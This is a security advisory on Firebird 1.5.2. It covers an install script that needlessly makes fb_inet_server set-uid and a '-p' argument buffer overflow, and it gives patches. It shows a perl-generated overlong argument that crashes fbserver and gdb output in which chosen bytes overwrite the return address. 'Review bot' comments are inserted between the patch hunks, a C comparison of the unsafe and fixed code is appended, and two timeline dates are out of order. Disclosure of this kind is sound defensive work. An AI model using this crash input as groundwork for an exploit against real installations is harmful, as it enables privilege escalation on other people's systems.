---------------------------------------------------------------------------
Buffer Overflow and Installation Script Error in Firebird 1.5.3
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005-02-18
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Product: Firebird
Vulnerable Version: 1.5.2.4731

Description: Firebird is a relational database offering many ANSI SQL-99
features that runs on Linux, Windows, and a variety of Unix platforms.
Firebird offers excellent concurrency, high performance, and powerful
language support for stored procedures and triggers. It has been used in
production systems, under a variety of names, since 1981.

Web: http://firebird.sourceforge.net

---------------------------------------------------------------------------

Vulnerability List:
~~~~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecessarily
B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

Vulnerabilities:
~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecessarily

- The installation script of Firebird 1.5.2 makes the binaries fb_inet_server
  and fbserver suid firebird, but this is unnecessary. If you take a look at
  the install script "firebird1.5.2.XXXX/scripts/postinstall.sh" you will see
  the following lines:

  (...)
  # SUID is still needed for group direct access. General users
  # cannot run though.
  for i in fb_lock_mgr gds_drop fb_inet_server
  do
      if [ -f $i ]
      then
          chmod ug=rx,o= $i
          chmod ug+s $i
      fi
  done
  (...)

  but, as the author says, fb_inet_server (at least) doesn't need to be suid
  firebird. The following is a fragment of the response of Alex Peshkov (a
  Firebird developer) about this problem:

    They need not and should not be set*id. And in standard precompiled
    binaries fbserver is not setuid.
    But for reasons unknown to me, fb_inet_server is made setuid 'firebird'
    by the install script (the Debian guys fixed it, I think). I noticed it,
    unfortunately, after the release of 1.5.2, but will definitely fix it in
    future releases. Apart from the security vulnerability, this brings an
    additional problem when one wants to change the fb_inet_server run-user:
    changing only the xinetd.d entry is not enough.

- Debian distributions are not vulnerable to this problem. As Alex Peshkov
  says, the Debian people have fixed it.

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

- The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable
  to a buffer overflow. If a string of more than 150 characters is passed to
  the '-p' parameter of either of these binaries, the program crashes with a
  "Segmentation fault" message.

- The following is a test of the vulnerability:

  /usr/lib/firebird2/bin$ ls
  fb_lock_print fbguard fbmgr fbmgr.bin fbserver gsec
  /usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234
  Segmentation fault

  The program dies abruptly. The bytes passed at positions 155 to 159
  overwrite the return address:

  /usr/lib/firebird2/bin$ gdb ./fbserver
  GNU gdb 6.3
  (...)
  (gdb) run -p `perl -e 'print "a"x155;'`4321
  Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print "a"x155;'`4321
  (...)
  Program received signal SIGSEGV, Segmentation fault.
  [Switching to Thread -1210892160 (LWP 25358)]
  0x31323334 in ?? ()

  We have overwritten the return address with the bytes 0x31 0x32 0x33 0x34,
  the digits 4 3 2 1 in reverse order.

  (gdb) where
  #0  0x31323334 in ?? ()
  #1  0x08233496 in ?? ()
  #2  0x00000000 in ?? ()
  #3  0xbffff9b0 in ?? ()
  #4  0x00006161 in ?? ()
  #5  0x00000000 in ?? ()
  #6  0x00000000 in ?? ()
  #7  0x00000000 in ?? ()
  #8  0x00000000 in ?? ()
  #9  0x00000000 in ?? ()
  #10 0xbffff9b0 in ?? ()
  #11 0x00000000 in ?? ()
  #12 0x00000000 in ?? ()
  #13 0x00000000 in ?? ()
  #14 0xbffffb04 in ?? ()
  #15 0x0804e370 in ?? ()
  #16 0x00000000 in ?? ()
  #17 0xbffffd50 in ?? ()
  #18 0x00000000 in ?? ()
  #19 0x00000000 in ?? ()
  #20 0x00000000 in ?? ()
  #21 0x00000000 in ?? ()
  #22 0x00000000 in ?? ()

Notes:
~~~~~~

- Various other problems, not discovered by me, have been fixed in the 1.5.3
  version. I encourage you to upgrade to the newest version as soon as
  possible.

Patches for the 1.5.2 version:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- The following are patches that solve ONLY the problems that I have found.

Patch for installation script:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------
--- scripts/postinstall.sh	2005-03-25 14:24:40.091819144 +0100
+++ scripts/postinstall.sh.corrected	2005-03-25 14:08:47.777592912 +0100
@@ -401,7 +401,7 @@
     # SUID is still needed for group direct access. General users
     # cannot run though.
-    for i in fb_lock_mgr gds_drop fb_inet_server
+    for i in fb_lock_mgr gds_drop
     do
         if [ -f $i ]
         then
@@ -508,7 +508,7 @@
     # SUID is still needed for group direct access. General users
     # cannot run though.
-    for i in fb_lock_mgr gds_drop fb_inet_server
+    for i in fb_lock_mgr gds_drop
     do
         if [ -f $i ]
         then
---------------------END OF THE PATCH------------------------------

Patch for fb_inet_server and/or fbserver buffer overflow:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------
--- src/remote/inet_server.cpp	2004-09-29 12:03:39.000000000 +0200
+++ src/remote/inet_server.cpp.corrected	2005-03-25 14:17:59.698688152 +0100
@@ -32,7 +32,7 @@
  *
  */
 /*
-$Id: inet_server.cpp,v 1.26.2.2 2004/09/29 10:03:39 paul_reeves Exp $
+$Id: inet_server.cpp,v 1.26.2.3 2005/03/23 12:59:25 alexpeshkoff Exp $
 */
 #include "firebird.h"
 #include "../jrd/ib_stdio.h"
@@ -277,7 +277,10 @@
             break;
         case 'P':
-            sprintf(protocol, "/%s", *argv++);
+            protocol[0] = '/';
+            protocol[1] = 0;
+            strncat(protocol, *argv++,
+                sizeof(protocol) - strlen(protocol) - 1);
             break;
         case 'H':
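Review bot: both postinstall.sh hunks drop fb_inet_server from the set-uid loop but leave the comment "SUID is still needed for group direct access" above it untouched, so it now reads as if it still justified fb_inet_server being set-uid; update the comment to say it applies to fb_lock_mgr and gds_drop only. Note also that this only changes what new installs do: an existing 1.5.2 installation keeps the set-uid bit on the installed fb_inet_server until an administrator clears it (e.g. chmod ug-s on that binary), and nothing in the patch does that.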
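Review bot: the strncat() form in the @@ -277 hunk bounds the copy but silently truncates an over-long -p value, so a protocol name that does not fit is accepted and then fails later in a less obvious way; consider rejecting the argument with an error when strlen(*argv) + 1 >= sizeof(protocol) instead of truncating it. The bound also only works if `protocol` is a local array, since sizeof on a pointer would yield 4 or 8 bytes and nothing would be fixed; the hunk does not show the declaration, so confirm it.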
@@ -407,12 +410,9 @@
 /* before starting the superserver stuff change directory to tmp */
     if (CHANGE_DIR(TEMP_DIR)) {
-        char err_buf[1024];
-        /* error on changing the directory */
-        sprintf(err_buf, "Could not change directory to %s due to errno %d",
+        gds__log("Could not change directory to %s due to errno %d",
                 TEMP_DIR, errno);
-        gds__log(err_buf);
     }
 /* Server tries to attash to security.fdb to make sure everything is OK
---------------------END OF THE PATCH------------------------------

The fix:
~~~~~~~~

The problems are fixed in the current 1.5.3 version of the Firebird binary
distribution.

Thanks
~~~~~~

Thanks to Alex Peshkov, who was very kind and professional.

Timeline:
~~~~~~~~~

2005-02-18: Initial contact.
2005-02-11: Contact with Alex Peshkov.
2005-03-25: BOF (and various others) fixed in CVS.
2005-03-25: Wait for ~2 months after the 1.5.3 release.
2006-01-25: Firebird 1.5.3 released.
2006-03-12: Public disclosure.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<>>>>es
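Review bot: the @@ -407 hunk passes the format string and its arguments straight to gds__log(), which is only correct if gds__log is declared as a printf-style variadic function; the hunk does not show its prototype, so confirm it (and that errno is still read before any call that could clobber it). The removed 1024-byte err_buf could not realistically overflow with a compile-time TEMP_DIR and an int, so this is cleanup rather than part of the -p fix; saying so in the commit message keeps the two changes distinguishable.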
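Added here as an illustration of the pattern section B describes and the inet_server.cpp patch applies; it is not Firebird's own code. It puts the unbounded sprintf() into a fixed-size buffer beside the bounded strncat() replacement and adds two defender's checks: that the fix leaves in-range input unchanged, and that over-long input is truncated instead of overflowing. PROTOCOL_SIZE and the function names are assumptions, since the advisory does not give the real buffer size.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size for illustration; the advisory does not state the real size
 * of `protocol`, only that a -p value of ~155 bytes crashes the binary. */
#define PROTOCOL_SIZE 128

/* Pattern the patch removes: sprintf() with no bound on `arg`, so anything
 * longer than PROTOCOL_SIZE - 2 bytes writes past the buffer (section B).
 * Kept for comparison; only ever called here with input that fits. */
static void build_protocol_unbounded(char *protocol, const char *arg)
{
    sprintf(protocol, "/%s", arg);
}

/* Pattern the patch introduces: write the "/" prefix, then append at most
 * what still fits, keeping one byte for the NUL. Returns resulting length. */
size_t build_protocol_bounded(char *protocol, size_t size, const char *arg)
{
    protocol[0] = '/';
    protocol[1] = '\0';
    strncat(protocol, arg, size - strlen(protocol) - 1);
    return strlen(protocol);
}

/* Check 1: for input that fits, the fix must give the same string as the
 * old code. Returns 1 if both agree; refuses input that would not fit. */
int bounded_matches_unbounded(const char *arg)
{
    char a[PROTOCOL_SIZE], b[PROTOCOL_SIZE];
    if (strlen(arg) + 2 > sizeof a)
        return 0;
    build_protocol_unbounded(a, arg);
    build_protocol_bounded(b, sizeof b, arg);
    return strcmp(a, b) == 0;
}

/* Check 2: length produced for an all-'a' -p value of arglen bytes, the
 * shape of the advisory's `perl -e 'print "a"x155'` input (constructed).
 * Never exceeds PROTOCOL_SIZE - 1, however long the input is. */
size_t bounded_length_for(size_t arglen)
{
    char arg[512], protocol[PROTOCOL_SIZE];
    if (arglen >= sizeof arg)
        arglen = sizeof arg - 1;
    memset(arg, 'a', arglen);
    arg[arglen] = '\0';
    return build_protocol_bounded(protocol, sizeof protocol, arg);
}
```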